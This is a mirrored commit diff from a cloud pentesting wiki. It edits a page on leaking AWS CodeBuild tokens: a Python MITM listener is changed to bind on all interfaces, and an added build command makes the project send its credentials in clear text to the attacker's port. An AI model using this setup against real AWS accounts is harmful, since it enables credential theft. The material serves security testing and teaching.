gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-21 14:50:57 -08:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #129 from RealFakeAccount/fix-AWS-Codebuild-Token-Leakage-Via-insecureSSL

Browse Source 
Update aws-codebuild-token-leakage.md
This commit is contained in:
SirBroccoli
2024-12-26 23:48:19 +01:00
committed by GitHub
parent 3e7a160eed 68c0d44a27
commit 90b6121d75
1 changed files with 8 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files

10
pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md
View File

@@ -149,7 +149,7 @@ aws codebuild update-project --name <proj-name> \
from mitm import MITM, protocol, middleware, crypto from mitm import MITM, protocol, middleware, crypto
mitm = MITM( mitm = MITM(
host="127.0.0.1", host="0.0.0.0",
port=4444, port=4444,
protocols=[protocol.HTTP], protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
@@ -158,7 +158,13 @@ mitm = MITM(
mitm.run() mitm.run()
``` ```
* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: * Next, click on **Build the project** or start the build from command line:
```sh
aws codebuild start-build --project-name <proj-name>
```
* Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port:
<figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>